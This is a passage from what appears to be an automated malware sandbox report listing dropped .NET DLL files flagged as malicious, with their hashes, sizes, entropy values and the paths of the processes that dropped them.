                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
